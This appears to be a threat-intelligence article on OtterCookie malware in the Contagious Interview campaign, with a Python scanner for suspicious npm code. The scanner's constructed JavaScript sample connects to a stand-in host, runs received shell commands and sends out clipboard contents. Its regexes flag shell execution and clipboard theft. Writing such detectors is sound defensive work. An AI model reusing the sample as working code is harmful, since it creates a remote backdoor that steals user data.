Palo Alto Networks unveiled the Contagious Interview campaign in November 2023, shedding light on a financially motivated attack that differs from the usual nation-sponsored incursions. This campaign, known for leveraging BeaverTail and InvisibleFerret malware, has now incorporated OtterCookie according to recent observations by Security Operations Centers (SOCs). The emergence of OtterCookie reflects a new phase in the campaign’s evolution, underscoring the need for organizations to maintain vigilant monitoring and up-to-date threat intelligence to effectively counter the risks posed by Contagious Interview.
Unlike traditional attacks that are linked to specific nations, Contagious Interview attacks exploit weaknesses in software development processes, and their delivery channels have diversified. While Node.js projects and npm packages have been the common entry points, the attackers are now also targeting applications built with the Qt and Electron frameworks. This shift shows that the threat actors are actively exploring the software supply chain for new ways in.
Previous research described loaders that download JavaScript code and execute it directly once the server responds with an HTTP 500 status code, a sequence that delivers the BeaverTail malware. More recent cases, however, show OtterCookie infections detected alongside BeaverTail, indicating a change in attack strategy.
The OtterCookie malware, observed in November 2024, communicates with its remote server over Socket.IO. Commands received through its socketServer function allow the operator to execute shell commands and exfiltrate device information. Analysis of these commands showed that OtterCookie collects cryptocurrency wallet keys from various files, transmits them to a remote server, and performs further reconnaissance with commands such as ls and cat.
A comparison of the November and September versions of OtterCookie shows significant advances in the November version, particularly in the theft of cryptocurrency keys. Both versions can perform this task, but the November version relies on remote shell commands rather than the regular expression-based checks used in September. The November version also adds clipboard monitoring through the clipboardy library to capture sensitive data from the victim's device, a feature the September variant lacks.
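The capability mix described in the two paragraphs above (a Socket.IO command channel, shell execution of operator-supplied commands, and clipboard reads via clipboardy) is something a SOC can hunt for statically in JavaScript packages before they run. The following is an added example, not code from the original report or from the malware: the regular expressions are an illustrative heuristic I constructed for this page, and both JavaScript samples are constructed stand-ins, not real OtterCookie code.

```python
import re
from typing import List

# Illustrative heuristic indicators (an assumption for this example, not
# published signatures). Each one maps to a behaviour described in the text.
INDICATORS = {
    # Socket.IO client pulled in for remote command-and-control
    "socketio_c2": re.compile(r"""require\(\s*['"]socket\.io-client['"]\s*\)"""),
    # child_process / exec-style calls used to run operator-supplied shell commands
    "shell_exec": re.compile(r"""require\(\s*['"]child_process['"]\s*\)|\b(?:exec|execSync|spawn)\s*\("""),
    # clipboardy used to read the victim's clipboard
    "clipboard_read": re.compile(r"""require\(\s*['"]clipboardy['"]\s*\)|clipboardy\.read(?:Sync)?\s*\("""),
}

# Constructed sample mimicking the capability mix (not real malware code).
SUSPECT_JS = """
const io = require('socket.io-client');
const { execSync } = require('child_process');
const clipboardy = require('clipboardy');
const socket = io('http://example.invalid');
socket.on('command', (cmd) => socket.emit('result', execSync(cmd).toString()));
setInterval(() => socket.emit('clip', clipboardy.readSync()), 5000);
"""
# Constructed benign module for contrast.
BENIGN_JS = """
const express = require('express');
const app = express();
app.get('/', (req, res) => res.send('hello'));
"""


def scan_source(source: str) -> List[str]:
    """Return the names of the indicators matched in a JavaScript source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def risk_score(hits: List[str]) -> int:
    """One point per indicator, plus a bonus when a remote channel and local
    shell execution appear together, which is the core of the behaviour above."""
    score = len(hits)
    if "socketio_c2" in hits and "shell_exec" in hits:
        score += 3
    return score


def classify(source: str) -> str:
    """Label a source as 'suspicious' when its score reaches the review threshold."""
    return "suspicious" if risk_score(scan_source(source)) >= 4 else "clean"


if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_JS), ("benign", BENIGN_JS)):
        print(label, scan_source(src), classify(src))
```

A hit list on its own is only a triage signal; the combination of a remote channel with command execution is what warrants pulling the package for manual review.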
According to NTT, the Contagious Interview threat actor group has released a new strain of malware, OtterCookie, designed to steal browser cookies and potentially compromise user accounts. The attack vector is still under investigation, but researchers have observed cases in Japan, signalling a geographical expansion of the campaign's reach.
In conclusion, the inclusion of OtterCookie in the Contagious Interview campaign underscores the dynamic nature of cyber threats and the ever-evolving tactics employed by threat actors. Organizations must remain proactive in their cybersecurity measures, continuously updating their defenses to mitigate the risks posed by such sophisticated attacks.
